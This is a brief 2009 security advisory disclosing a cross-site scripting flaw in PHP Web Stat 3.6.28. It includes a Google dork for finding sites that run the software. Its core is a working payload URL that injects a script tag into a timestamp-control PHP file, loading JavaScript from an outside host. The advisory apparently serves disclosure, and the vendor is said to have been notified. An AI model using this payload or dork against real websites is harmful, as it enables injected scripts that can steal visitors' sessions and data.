/*********************************************************************
  **                  PHP Web Stat XSS vulnerability
  **
  **    Date: 16/05/09
  **    URL: http://www.hell-spy.de/sec/CAV-2009-02.txt
  **    Greetings: BGM
  **    
  *********************************************************************/


The PHP Web Stat offers you a highly configurable web tracker and 
detailed real-time web stat script. You will be able to analyze and 
monitor all visitors of your website. Our script is totally FREE and 
licensed under the GNU General Public License (GPL).
Homepage: http://www.php-web-statistik.de/
Dork: "2008 PHP-Web-Stat"

The newest version of PHP Web Stat (3.6.28) is vulnerable to this XSS
attack:

$INSTALLDIR/stat/func/func_timestamp_control.php?parameter=1>"><ScRiPt+src=http://www.hell-spy.de/files/hell.js></ScRiPt>

vendor has been notified.